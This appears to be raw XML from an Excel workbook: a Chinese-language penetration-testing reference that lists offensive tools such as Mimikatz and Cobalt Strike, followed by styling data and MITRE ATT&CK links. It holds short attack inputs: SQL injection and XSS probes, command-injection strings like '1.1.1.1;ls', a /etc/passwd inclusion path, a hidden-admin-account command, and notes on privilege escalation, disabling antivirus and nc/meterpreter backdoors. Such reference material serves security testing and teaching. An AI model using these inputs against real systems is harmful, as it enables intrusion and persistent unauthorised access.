    <t xml:space="preserve">  FUSE(用户空间文件系统)作为类UNIX系统平台上可加载的内核模块，允许非特权用户创建功能完备的文件系统，而不需要重新编译内核。FUSE模块仅仅提供kernel模块的接入口，而本身的主要实现代码位于用户空间中。对于读写虚拟文件系统来说，FUSE是个很好的选择。 FUSE起初是为了研究AVFS(A VirtualFilesystem)而设计的，而现在已经成为SourceForge的一个独立项目，目前适用的平台有Linux,FreeBSD,NetBSD, OpenSolaris和Mac OS X。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Upsploit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Upsploit是用于文件上传漏洞识别和利用的跨平台渗透测试工具。 文件上传漏洞可能导致服务器端代码执行和完全破坏。 这些漏洞在网络上很多，但是很难测试，甚至很难正确测试。 Upsploit提供了许多测试，使渗透测试人员和开发人员能够轻松验证针对其Web应用程序中的文件上传漏洞实施的安全控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IISPutScanner</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可以用来扫描某个网络段的端口开放情况和对应的系统漏洞，针对某些漏洞，可向目标服务器直接上传脚本文件，控制目标主机。用于网络渗透的基本工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>burpsuite</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Burp Suite是一款集成化的渗透测试工具，包含了很多功能，可以帮助我们高效地完成对Web应用程序的渗透测试和攻击。Burp Suite 由Java语言编写，基于Java 自身的跨平台性，使这款软件学习和使用起来更方便。Burp Suite不像其他自动化测试工具，它需要手工配置一些参数，触发一些自动化流程，然后才会开始工作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSRFTester</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSRFTester是一款CSRF漏洞的测试工具。此工具的测试原理如下：它使用代理抓取浏览器中访问过的连接以及表单等信息，通过在CSRFTester中修改相应的表单等信息，重新提交，相当于一次伪造客户端请求，如果被测试的请求成功被网站服务器接受，则说明存在CSRF漏洞，否则不存在。当然此款工具也可以被用来进行CSRF攻击。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSRF Request Builder</t>
  </si>
  <si>
    <t xml:space="preserve"> CSRF Request Builder是一款CSRF漏洞利用和测试工具。CSRF Request Builder可以生成用于实际系统在现实场景中的POC，但是这些poc只是以测试为目的，离实际的GJ还是有差距的...作者写这个工具的原因是：当前用HTML/JS实现JOSN的CSRF是比较容易的，但是他在一次渗透测试过程中，发现被测试的应用会验证，请求中是否包含content-type :  application/json。因此为了完成这个测试他用Flash实现了这个工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Struts2 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> Struts2 是一个基于 MVC 设计模式的 Web 应用框架，它本质上相当于一个 servlet，在 MVC 设计模式中，Struts2 作为控制器 (Controller) 来建立模型与视图的数据交互 Struts2曝出2个高危安全漏洞，一个是使用缩写的导航参数前缀时的远程代码执行漏洞 另一个是使用缩写的重定向参数前缀时的开放式重定向漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fimap</t>
  </si>
  <si>
    <t>Fimap是一款本地及远程的文件包含漏洞检测工具，并能对检测到的漏洞进行利用，带了一个google的语法搜索功能，这款工具只针对文件包含漏洞的检测及利用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PowerView</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是一个PowerShell工具，用于获取Windows域的网络态势感知。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PowerUp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是本地特权提升的一些调用方法，功能相当强大，拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The Elevate Kit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>演示如何在Cobalt Strike的Beacon payload中使用PowerShell以及反射DLL exploit。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Tokenvator</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一款利用Windows Tokens提权的工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherlock</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个在Windows下用于本地提权的PowerShell脚本。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DeathStar</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一键自动化域渗透工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Inveigh</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是一款Windows PowerShell的LLMNR/NBNS协议欺骗/中间人工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WMIOps</t>
  </si>
  <si>
    <t>PowerShell脚本，它使用WMI在Windows环境中的本地或远程主机上执行各种操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Mimikatz </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一款获取windows密码的工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cobaltstrike</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>①Cobalt Strike可以使用AggressorScripts脚本来加强自身，使其更加丰满，能够扩展菜单栏，视图Beacon命令行，提权脚本等；
②Cobalt Strike通信配置文件是Malleable C2，你可以修改CS的通讯特征，Beacon payload的一些行为；
③Cobalt Strike可以引用其他的通讯框架ExternalC2，ExternalC2是由Cobalt Strike提出的一套规范/框架，它允许黑客根据需要对框架提供的默认HTTP(S)/DNS/SMB C2 通信通道进行扩展。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>hidenadmin</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在主机的命令提示符下运行的命令格式为“HideAdmin 用户名$ 密码”。例如输入“HideAdmin lovezhen$ 123456”并回车，这样我们就创建了一个具有管理员权限，ID为lovezhen$，密码为123456的账号。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Savior</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主要功能
用户管理：主要是方便统计漏洞的发现者，根据提交数据、漏洞类型、时间等进行统计报表，当前用户管理模块仅允许通过Django后台进行修改，前端只负责展示.
项目管理：根据项目的不同可上传项目的专属渗透测报告模板，并可以根据需要进行模板自定义模板；
模板自定义：不用修改源代码，仅需修改word即可进行模板自定义；
整改建议管理：此平台主要就是为了体现标准化输出，因此可通过内置漏洞描述及修复建议进行快速输出，并支持自定义修改（/Demo/常规WEB渗透测试漏洞描述及修复方法.docx）；
一键生成：通过提交报告模块，内联项目模板，快速生成渗透测试报告，真正达到了一键生成，并确保报告内数据准确、字体统一、格式标准；
自动邮件：在生成报告后可通过用户管理配置的自动邮件发送功能进行邮件通知，可自定义邮件模板，这样再报告给客户的时候就可以直接转发了；
漏洞统计：每次渗透过后，需要挨个查找报告进行统计整理，现在只要提交报告后，后台会自动联动；
漏洞报表一键导出;
漏洞跟踪：增加了漏洞状态字段，创建报告后，漏洞状态默认为新增，漏洞管理模块可进行复测，包括已整改、未整改两种状态.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.SQL注入漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在URL后面输入 and 1=1 或者 and 1=2 回车，如果还是能够正常登录此网页，二没有提示“非法字符”或者提示“非法字符”等类似的字样就说明此网站能够SQL注入。</t>
  </si>
  <si>
    <t>2.XSS跨站脚本漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在网页的输入点输入&lt;script&gt;alert('xss')&lt;/script&gt;，若存在弹窗则证明存在SS漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.文件上传漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>找到上传文件的地方，试着上传一个可执行文件，若可以上传，则说明该网站存在上传漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.服务端请求伪造漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>任何需要传入URL的接口都有可能出现ssrf漏洞，可根据实际业务场景对功能接口进行漏洞验证。ssrf漏洞可分为有回显型和无回显型，有回显型ssrf可以直接通过页面加载出目标资产，可先尝试加载http://www.baidu.com 页面确认有ssrf，如果成功的话，可进一步将百度换成内网IP，通过fuzz扫描内网资产。
无回显型ssrf的检测需要先配合dnslog平台，测试dnslog平台能否获取到服务器的访问记录，如果没有对应记录，也可能是服务器不出网造成的，利用时可以通过请求响应时间判断内网资产是否存在，然后再利用内网资产漏洞（比如redis以及常见可RCE的web框架）证明漏洞的有效性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.XML外部实体注入漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 通过定义一个指向系统文件的外部实体，尝试对系统文件目录进行遍历，查看返回包是否包含XXE注入信息。
    构建http://dnslog.cn/等基于可控的外部实体注入，然后对可控URL进行监控，判断是否存在XXE漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.跨站请求伪造漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>抓取一个正常请求的数据包，去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>7.命令执行漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>例如在一个调用ping命令的表单中输入一个ip地址，系统会即将ping这个IP的结果返回，此时可以尝试在表单中输入'1.1.1.1;ls'，如果系统过滤不严则后面的ls也将被执行，则存在.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>8.文件包含漏洞检测</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当URL中包含有'?变量=XXX' 字眼时非常有可能是程序通过include将文件XXX包含进来了，此处就可以测试是否有文件包含漏洞，通过尝试更改调用路径?page=file://etc/passwd，若还能出现正常页面，正常调用则存在文件包含漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQL注入</t>
  </si>
  <si>
    <t>手工：首先查看是否存在某个表，如是否存在admin表，命令为： and exists(select * from admin)回车，如果还是正常显示此网页，证明数据库中存在admin表，那么管理员账号和密码一般都是存在与这个表内。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>跨站脚本攻击</t>
  </si>
  <si>
    <t>手工：输入带有Cookie窃取，会话劫持，钓鱼欺骗等各种各样的攻击恶意代码或者一个带有恶意HTML/JavaScript的url链接。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件上传</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手工：在注入点上传具有恶意功能的脚本文件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务端请求伪造</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手工：1.对外网、服务器所在的内网、本地进行端口扫描，获取一些服务的Banner信息；2.攻击运行在内网或本地的应用程序；3.对内网Web应用进行指纹识别，识别企业内部的资产信息；4.攻击内外网的Web应用，主要是使用GET请求就可以实现的攻击（比如: Struts2、 sqli）；5.下载内网资源(如：利用file协议读取本地文件等)；6.进行跳板；7.无视cdn；8.利用Redis未授权访问，HTTP CRLF注入实现getshell</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XML外部实体注入</t>
  </si>
  <si>
    <t>攻击类型：1.利用XXE检索文件，其中定义了一个包含文件内容的外部实体，并在应用程序的响应中返回；2.利用XXE执行SSRF攻击，其中基于到后端系统的URL定义了外部实体；3.利用盲目的XXE泄漏带外数据，其中敏感数据从应用程序服务器传输到攻击者控制的系统；4.利用盲目的XXE通过错误消息检索数据，攻击者可以在其中触发包含敏感数据的解析错误消息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>跨站请求伪造</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手工：1.攻击者通过在WebA中添加图片链接等方式诱导用户访问网站WebB；2.在用户被诱导访问WebB后，WebB会利用用户的浏览器访问第三方网站WebA，并发出操作请求；3.用户的浏览器根据WebB的要求，带着步骤一中产生的Cookie访问WebA；4.网站WebA接收到用户浏览器的请求，WebA无法分辨请求由何处发出，由于浏览器访问时带上用户的Cookie，因此WebA会响应浏览器的请求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令执行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手工：通过直接输入例如：ping 192.168.1.1&amp;net user直接执行系统命令，通过在Web服务器绕过限制上传脚本文件，脚本文件内容是执行系统命令，然后通过输入例如：(&lt;?PHP SYSTEM("dir")？&gt;)通过执行脚本语言来间接执行系统命令。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件包含</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>常用方法：（1）require:找不到被包含的文件，报错，并且停止运行脚本；（2）include：找不到被包含的文件，只会报错；（3）require_once:与require类似，区别在于当重复调用同一但会继续运行脚本文件时，程序只调用一次；（4）include_once:与include类似，区别在于当重复调用同一文件时，程序只调用一次</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.权限提升</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>（1）windows：1:systeminfo查看补丁 2:sc命令(从administrator-system)  3:UAC权限机制(msf:ask,bypassuac等机制) 4: 不带引号的服务路径 。
（2）linux：1:内核提权(uname -a)   2:suid提权(cp ,find,vim)  3:c文件编译后执行提权 4:定时任务提权   5:token欺骗
（3）mysql：1 :udf提权(udf扩展程序)   2: mof(写入代码,让SQL执行,多少时间执行一次)   3:启动项(写入vbs)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器信息,sniff数据包(svn,http,ftp等) ,hash,关闭防火墙杀毒软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.内网渗透</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开启3389 ,端口转发,代理/跳跳板攻击</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.维持权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>永久后门维持权限。1. msterpreter (存储内存)；2. Nc后门 (存储文件)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</si>
</sst>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9"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="等线"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF39434C"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF333333"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Microsoft Sans Serif"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFFFFFF"/>
      <name val="Microsoft Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Microsoft Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFFFFFF"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="7">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A6CAF0"/>
        <bgColor rgb="FFA6CAF0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFA8072"/>
        <bgColor rgb="FFFA8072"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF292D37"/>
        <bgColor rgb="FF292D37"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="6">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFDFDFDF"/>
      </left>
      <right style="medium">
        <color rgb="FFDFDFDF"/>
      </right>
      <top style="medium">
        <color rgb="FFDFDFDF"/>
      </top>
      <bottom style="medium">
        <color rgb="FFDFDFDF"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFDFDFDF"/>
      </left>
      <right style="medium">
        <color rgb="FFDFDFDF"/>
      </right>
      <top style="medium">
        <color rgb="FFDFDFDF"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFDFDFDF"/>
      </left>
      <right style="medium">
        <color rgb="FFDFDFDF"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FFDFDFDF"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFDFDFDF"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FFA0A0A0"/>
      </left>
      <right style="thin">
        <color rgb="FFA0A0A0"/>
      </right>
      <top style="thin">
        <color rgb="FFA0A0A0"/>
      </top>
      <bottom style="thin">
        <color rgb="FFA0A0A0"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="3">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="34">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="15" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="2" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="2" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="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3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="2" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="1" applyFont="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="9" fillId="4" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="4" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 2" xfId="1" xr:uid="{ADDC9DBD-CC7B-434A-911E-A14F272FB6D9}"/>
    <cellStyle name="超链接" xfId="2" builtinId="8"/>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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0076" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0001" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0031" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0051" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0126" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0004" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0014" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0040" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0139" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0067" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0041" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0016" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0052" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0105" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0117" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0036" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0095" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0021" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0091" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0107" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0102" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0006" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0011" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0075" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0135" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0060" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0066" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0085" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0072" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0094" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0088" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0131" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0069" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0133" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0022" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0064" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0132" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 